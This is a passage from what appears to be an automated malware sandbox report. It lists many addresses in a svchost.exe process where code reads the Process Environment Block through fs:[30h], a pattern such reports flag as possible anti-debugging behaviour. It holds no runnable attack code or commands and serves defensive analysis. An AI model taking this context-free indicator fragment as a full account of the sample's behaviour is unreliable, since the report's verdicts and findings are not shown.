            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE75D mov eax, dword ptr fs:[00000030h]1_2_039BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4755 mov eax, dword ptr fs:[00000030h]1_2_039B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov esi, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938770 mov eax, dword ptr fs:[00000030h]1_2_03938770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039666B0 mov eax, dword ptr fs:[00000030h]1_2_039666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C6A6 mov eax, dword ptr fs:[00000030h]1_2_0396C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov eax, dword ptr fs:[00000030h]1_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972619 mov eax, dword ptr fs:[00000030h]1_2_03972619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE609 mov eax, dword ptr fs:[00000030h]1_2_039AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E627 mov eax, dword ptr fs:[00000030h]1_2_0394E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03966620 mov eax, dword ptr fs:[00000030h]1_2_03966620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968620 mov eax, dword ptr fs:[00000030h]1_2_03968620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393262C mov eax, dword ptr fs:[00000030h]1_2_0393262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C640 mov eax, dword ptr fs:[00000030h]1_2_0394C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962674 mov eax, dword ptr fs:[00000030h]1_2_03962674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E59C mov eax, dword ptr fs:[00000030h]1_2_0396E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov eax, dword ptr fs:[00000030h]1_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov ecx, dword ptr fs:[00000030h]1_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964588 mov eax, dword ptr fs:[00000030h]1_2_03964588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039365D0 mov eax, dword ptr fs:[00000030h]1_2_039365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039325E0 mov eax, dword ptr fs:[00000030h]1_2_039325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6500 mov eax, dword ptr fs:[00000030h]1_2_039C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039644B0 mov ecx, dword ptr fs:[00000030h]1_2_039644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BA4B0 mov eax, dword ptr fs:[00000030h]1_2_039BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039364AB mov eax, dword ptr fs:[00000030h]1_2_039364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039304E5 mov ecx, dword ptr fs:[00000030h]1_2_039304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C427 mov eax, dword ptr fs:[00000030h]1_2_0392C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392645D mov eax, dword ptr fs:[00000030h]1_2_0392645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395245A mov eax, dword ptr fs:[00000030h]1_2_0395245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC460 mov ecx, dword ptr fs:[00000030h]1_2_039BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]1_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]1_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEBD0 mov eax, dword ptr fs:[00000030h]1_2_039DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EBFC mov eax, dword ptr fs:[00000030h]1_2_0395EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCBF0 mov eax, dword ptr fs:[00000030h]1_2_039BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]1_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]1_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]1_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]1_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]1_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]1_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FAB40 mov eax, dword ptr fs:[00000030h]1_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D8B42 mov eax, dword ptr fs:[00000030h]1_2_039D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392CB7E mov eax, dword ptr fs:[00000030h]1_2_0392CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968A90 mov edx, dword ptr fs:[00000030h]1_2_03968A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04A80 mov eax, dword ptr fs:[00000030h]1_2_03A04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]1_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]1_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986AA4 mov eax, dword ptr fs:[00000030h]1_2_03986AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930AD0 mov eax, dword ptr fs:[00000030h]1_2_03930AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]1_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]1_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]1_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]1_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCA11 mov eax, dword ptr fs:[00000030h]1_2_039BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]1_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]1_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA24 mov eax, dword ptr fs:[00000030h]1_2_0396CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EA2E mov eax, dword ptr fs:[00000030h]1_2_0395EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]1_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]1_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]1_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]1_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov esi, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD mov eax, dword ptr fs:[00000030h]1_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD mov eax, dword ptr fs:[00000030h]1_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
